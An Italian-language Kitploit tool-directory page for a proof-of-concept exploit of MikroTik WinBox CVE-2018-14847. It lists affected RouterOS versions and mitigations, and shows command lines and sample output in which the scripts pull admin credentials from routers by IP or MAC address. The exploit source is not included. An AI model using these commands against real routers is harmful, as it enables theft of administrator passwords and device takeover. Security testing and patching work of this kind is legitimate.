Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Mikrotik-router-hack — Questa è una prova di concetto della vulnerabilità critica di WinBox (CVE-2018-14847) che consente la lettura arbitraria di file contenenti password in chiaro. La vulnerabilità è stata corretta molto tempo fa, quindi questo progetto è terminato e non verrà più supportato o aggiornato. Puoi forkarlo e aggiornarlo tu stesso. | Kitploit
Strumenti/GitHubGitHub/hacker30468/mikrotik-router-hack
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza di RetePenetration Testing
GitHubhacker30468/mikrotik-router-hack

Mikrotik-router-hack

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questa è una prova di concetto della vulnerabilità critica di WinBox (CVE-2018-14847) che consente la lettura arbitraria di file contenenti password in chiaro. La vulnerabilità è stata corretta molto tempo fa, quindi questo progetto è terminato e non verrà più supportato o aggiornato. Puoi forkarlo e aggiornarlo tu stesso.

55235 anni faRevisionato da Kitploit
Condividi

WinboxExploit

Questa è una prova di concetto della critica vulnerabilità WinBox (CVE-2018-14847) che permette la lettura arbitraria di file contenenti password in testo chiaro.

La vulnerabilità è stata corretta da tempo, quindi questo progetto è terminato e non sarà più supportato o aggiornato. Puoi forkarlo e aggiornarlo da solo.

Articolo del blog

https://n0p.me/winbox-bug-dissection/

Requisiti

  • Python 3+

Questo script NON funzionerà con Python 2.x o versioni precedenti.

Come Usare

Lo script si usa semplicemente con argomenti semplici dalla riga di comando.

WinBox (TCP/IP)

Sfrutta la vulnerabilità e legge la password.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

Esempio:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

Server MAC WinBox (Layer 2)

Puoi estrarre file anche se il dispositivo non ha un indirizzo IP.

Semplice controllo di scoperta per dispositivi Mikrotik connessi localmente.

root@kitploit:~
python3 MACServerDiscover.py

Esempio:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Sfrutta la vulnerabilità e legge la password.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

Esempio:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Versioni Vulnerabili

Tutte le versioni di RouterOS dal 28-05-2015 al 20-04-2018 sono vulnerabili a questo exploit.

Dispositivi Mikrotik che eseguono versioni RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

Per maggiori informazioni vedere: https://blog.mikrotik.com/security/winbox-vulnerability.html

Tecniche di Mitigazione

  • Aggiornare il router a una versione di RouterOS che includa la correzione.
  • Disabilitare il servizio WinBox sul router.
  • È possibile limitare l'accesso al servizio WinBox a specifici indirizzi IP con quanto segue:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Si possono usare regole di filtro (ACL) per negare l'accesso esterno al servizio WinBox:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • Limitare l'accesso al servizio mac-winbox può essere fatto specificando le interfacce consentite:
root@kitploit:~
/tool mac-server mac-winbox

Copyright

  • Sponsorizzato dal CERTCC iraniano (https://certcc.ir). Tutti i diritti riservati.
Scarica lo strumento